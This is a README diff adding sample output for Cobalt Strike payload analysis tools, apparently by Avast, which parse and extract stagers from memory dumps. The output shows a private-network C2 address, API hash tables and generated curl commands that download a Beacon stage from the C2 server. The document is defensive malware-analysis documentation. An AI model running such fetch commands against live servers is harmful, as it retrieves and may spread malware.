diff --git a/CobaltStrike/payload_tools/README.md b/CobaltStrike/payload_tools/README.md index 1697a42..db76d84 100644 --- a/CobaltStrike/payload_tools/README.md +++ b/CobaltStrike/payload_tools/README.md @@ -14,6 +14,46 @@ Example: cs_payload_parser.py memdump.bin cs_payload_parser.py c:\cs_payloads\ ``` +Output: +``` +.log +``` +``` +-------------------------------------------------------------------------------- +Filename: fhttps_raw_x86 +-------------------------------------------------------------------------------- +Architecture: x86 +Payload type: HTTPS stager +Payload start: 0x0000 +Customer ID: 0x12345678 | 305419896 +-------------------------------------------------------------------------------- +Request detail: +Address: 192.168.42.2 +Port: 444 +Query: /AYhZ (Beacon_x86 checksum) +-------------------------------------------------------------------------------- +Request header: +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;PTBR) +-------------------------------------------------------------------------------- +Curl download command: +curl -o beacon_x86.bin -H "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;PTBR)" https://192.168.42.2:444/AYhZ +-------------------------------------------------------------------------------- +Payload API list: +Offset | Hash value | API name +0x009c | 0x0726774c | kernel32.dll_LoadLibraryA +0x00af | 0xa779563a | wininet.dll_InternetOpenA +0x00cb | 0xc69f8957 | wininet.dll_InternetConnectA +0x00e7 | 0x3b2e55eb | wininet.dll_HttpOpenRequestA +0x0100 | 0x869e4675 | wininet.dll_InternetSetOptionA +0x0110 | 0x7b18062d | wininet.dll_HttpSendRequestA +0x0129 | 0x5de2c5aa | kernel32.dll_GetLastError +0x0132 | 0x315e2145 | user32.dll_GetDesktopWindow +0x0141 | 0x0be057b7 | wininet.dll_InternetErrorDlg +0x02e9 | 0x56a2b5f0 | kernel32.dll_ExitProcess +0x02fd | 0xe553a458 | kernel32.dll_VirtualAlloc +0x0318 | 0xe2899612 | wininet.dll_InternetReadFile +-------------------------------------------------------------------------------- +``` ## cs_payload_extractor.py @@ -27,4 +67,56 @@ Example: ``` cs_payload_extractor.py memdump.bin cs_payload_extractor.py c:\cs_payloads\ -``` \ No newline at end of file +``` +Output: +``` +_payload.bin +_payload.bin.log +``` +``` +-------------------------------------------------------------------------------- +CS Payload extractor v1.00 Avast Software s.r.o +-------------------------------------------------------------------------------- +[*] Extracting file.. +-------------------------------------------------------------------------------- +Filename: fhttps_exe_x86 +Payload type: xored_payload +-------------------------------------------------------------------------------- +Saved as: fhttps_exe_x86_payload.bin +-------------------------------------------------------------------------------- +[*] Parsing file.. +-------------------------------------------------------------------------------- +Filename: fhttps_exe_x86_payload.bin +-------------------------------------------------------------------------------- +Architecture: x86 +Payload type: HTTPS stager +Payload start: 0x0000 +Customer ID: 0x12345678 | 305419896 +-------------------------------------------------------------------------------- +Request detail: +Address: 192.168.42.2 +Port: 444 +Query: /IZVc (Beacon_x86 checksum) +-------------------------------------------------------------------------------- +Request header: +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MASP) +-------------------------------------------------------------------------------- +Curl download command: +curl -o beacon_x86.bin -H "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MASP)" https://192.168.42.2:444/IZVc +-------------------------------------------------------------------------------- +Payload API list: +Offset | Hash value | API name +0x009c | 0x0726774c | kernel32.dll_LoadLibraryA +0x00af | 0xa779563a | wininet.dll_InternetOpenA +0x00cb | 0xc69f8957 | wininet.dll_InternetConnectA +0x00e7 | 0x3b2e55eb | wininet.dll_HttpOpenRequestA +0x0100 | 0x869e4675 | wininet.dll_InternetSetOptionA +0x0110 | 0x7b18062d | wininet.dll_HttpSendRequestA +0x0129 | 0x5de2c5aa | kernel32.dll_GetLastError +0x0132 | 0x315e2145 | user32.dll_GetDesktopWindow +0x0141 | 0x0be057b7 | wininet.dll_InternetErrorDlg +0x02e9 | 0x56a2b5f0 | kernel32.dll_ExitProcess +0x02fd | 0xe553a458 | kernel32.dll_VirtualAlloc +0x0318 | 0xe2899612 | wininet.dll_InternetReadFile +-------------------------------------------------------------------------------- +```